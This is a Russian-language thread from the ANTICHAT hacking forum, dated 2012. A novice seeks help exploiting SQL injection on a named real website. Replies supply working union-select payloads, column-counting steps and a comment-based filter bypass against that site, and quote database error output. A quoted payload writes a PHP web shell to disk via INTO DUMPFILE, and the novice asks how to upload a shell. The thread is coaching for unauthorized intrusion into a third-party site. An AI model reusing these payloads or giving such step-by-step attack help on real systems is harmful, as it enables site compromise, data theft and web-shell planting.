HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > ИНФО > Статьи > Авторские статьи
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 26.08.2012, 20:04
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

а что Вы вывели таким кодом?
 

  #2  
Старый 26.08.2012, 22:52
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Цитата:
Сообщение от Дирижабль  
union+select+1,'',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*
Подскажите пожалуйста здесь подробнее.

'
 

  #3  
Старый 28.08.2012, 23:06
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13

Затем ввожу

site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+

Ошибка.В чём здесь моя ошибка?Спасибо.
 

  #4  
Старый 28.08.2012, 23:48
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами: 7258646

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
Подскажите пожалуйста пытаюс раскрутить скулу site.ru/index.php?ID=1+order+by+13 ошибки нету order+by+14 ошибка есть значить колонок 13
Затем ввожу
site.ru/index.php?ID=1+union+select+1,2,3,4,5,6,7,8,9,10,1 1,12,13+--+
Ошибка.В чём здесь моя ошибка?Спасибо.
Таким способом колонки не всегда удаётся узнать, линк в студию
 

  #5  
Старый 29.08.2012, 22:52
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
 

  #6  
Старый 29.08.2012, 23:49
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
С нами: 9176038

Репутация: 8
По умолчанию

Цитата:
Сообщение от Sat-hacker  
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
неправильно поля подобрал...

Вывод можно получить так

Код:
_ttp://www.greenbergresearch.com/index.php?ID=9/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,unhex(Hex(version())),14--
Failed opening '/var/www/html/inc/templates/4.1.12' for inclusion

А вообще тема для таких вопросов тут
 

  #7  
Старый 30.08.2012, 00:33
Sharp.Net
Познающий
Регистрация: 28.07.2012
Сообщений: 39
С нами: 7258646

Репутация: 1
По умолчанию

Цитата:
Сообщение от Sat-hacker  
http://www.greenbergresearch.com/index.php?ID=1+group+by+13+--+
http://www.greenbergresearch.com/index.php?ID=-1+order+by+15+--+

False

http://www.greenbergresearch.com/index.php?ID=-1+order+by+14+--+

True - Not found

Значит - Столбцов 14

дальше багбир разъяснил. Суть в том, что нужно было ID не действительный сделать, -1 или 999999999999
 

  #8  
Старый 30.08.2012, 00:48
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Подскажите а вожможно ли залить shell через такую sql уязвимость?И как?Сори за тупой вопрос.Новичёк в этих делах.
 

  #9  
Старый 30.08.2012, 08:35
Sat-hacker
Познающий
Регистрация: 19.05.2012
Сообщений: 98
С нами: 7359446

Репутация: -10
По умолчанию

Просто не очень понял как при помощи этого кода '' залить shell.

Что за код такой?И как из него может получиться shell?Не не наркоман,просто не могу разобраться вот и спросил.А тему читтал раз 10.Не всё понялю
 

  #10  
Старый 30.08.2012, 08:43
M_script
Новичок
Регистрация: 04.11.2004
Сообщений: 5
С нами: 11322426

Репутация: 0
По умолчанию

Цитата:
Сообщение от Sat-hacker  
просто не могу разобраться вот и спросил
просто не пытаешься разобраться вот и спрашиваешь
 
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
SQL Injection: Modes of Attack, Defence, and Why It Matters bxN5 Forum for discussion of ANTICHAT 1 09.04.2007 19:07
SQL Injection FAQ bx_N Forum for discussion of ANTICHAT 2 08.03.2007 18:48



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...